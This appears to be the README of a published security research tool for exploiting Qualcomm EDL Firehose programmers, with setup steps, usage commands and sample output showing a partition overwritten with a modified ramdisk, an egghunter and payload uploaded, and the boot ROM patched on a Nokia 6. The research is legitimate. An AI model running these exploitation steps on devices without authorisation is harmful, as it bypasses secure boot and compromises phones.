By Roee Hay (@roeehay) & Noam Hadad, Aleph Reseserch, HCL Technologies
Research & Exploitation framework for Qualcomm EDL Firehose programmers.
Blog posts:
- Exploiting Qualcomm EDL Programmers (1): Gaining Access & PBL Internals
- Exploiting Qualcomm EDL Programmers (2): Storage-based Attacks & Rooting
- Exploiting Qualcomm EDL Programmers (3): Memory-based Attacks & PBL Extraction
- Exploiting Qualcomm EDL Programmers (4): Runtime Debugger
- Exploiting Qualcomm EDL Programmers (5): Breaking Nokia 6's Secure Boot
To use this tool you'll need:
- Qualcomm Product Support Tools (QPST - we used version 2.7.437 running on a windows 10 machine)
- A Cross compiler to build the payload for the devices (we used arm-eabi-4.6 toolchain for aarch32 and aarch64-linux-android-4.8 toolchain for aarch64, both running on ubuntu 16.04 machine) 3. Acquire the relevant programmers and copy them to the host/target/device directory
First, edit the Makefile in the device directory - set the device variable to whatever device you want (nokia6, angler, ugglite, mido and cheeseburger are currently supported).
Next, set the CROSS_COMPILE_32 and CROSS_COMPILE_64 enviroment vars as follows:
export CROSS_COMPILE_32=<path-to-arm-eabi-4.6-toolchain>/bin/arm-eabi- export CROSS_COMPILE_64=<path-to-aarch64-linux-android-4.8-toolchain>/bin/aarch64-linux-android- Then call make and the payload for your specific device will be built
Before we start, we need to configure some stuff, edit the constants.py file in the host directory:
- set COM to whatever com port the device is connnected to
- set FH_LOADER with a path to the fh_loader.exe in the QPST\bin directory
- set SAHARA_SERVER with a path to the QSaharaServer.exe in the QPST\bin directory
COM="COM17"FH_LOADER=r"C:\Program Files (x86)\Qualcomm\QPST437\bin\fh_loader.exe"SAHARA_SERVER=r"C:\Program Files (x86)\Qualcomm\QPST437\bin\QSaharaServer.exe"c:\firehorse\host>python firehorse.py -s -c COM17 -t nokia6 target magic INFO: sending programmer... INFO: Overwriting partition logdump with ../tmp\nokia6-ramdisk-modified.cpio.gz... INFO: applying patches and breakpoints... INFO: installing bp for 0010527c INFO: installing bp for 00104130 [...] INFO: creating pagecopy... INFO: pages: set([272, 256, 259, 260, 261]) INFO: uploading firehorse data... INFO: uploading egghunter to 080af000 INFO: 080af000 INFO: i = 0, dst = 080d0000, cksum = d1fe325f INFO: i = 1, dst = 080d0320, cksum = 3c092224 INFO: got all parts in 1 tries INFO: uploading firehorse... INFO: i = 0, dst = 080b0000, cksum = f5234b61 INFO: i = 1, dst = 080b0320, cksum = 641cb436 [...] INFO: got all parts in 2 tries INFO: initializing firehorse... INFO: calling pbl patcher... c:\firehorse\host>python firehorse.py -c COM17 -t nokia6 fw hello c:\firehorse\host>python firehorse.py -c COM17 -t nokia6 fw peek 0x100000 0x10 INFO: 00100000 22 00 00 ea 70 00 00 ea 74 00 00 ea 78 00 00 ea "...p...t...x... 
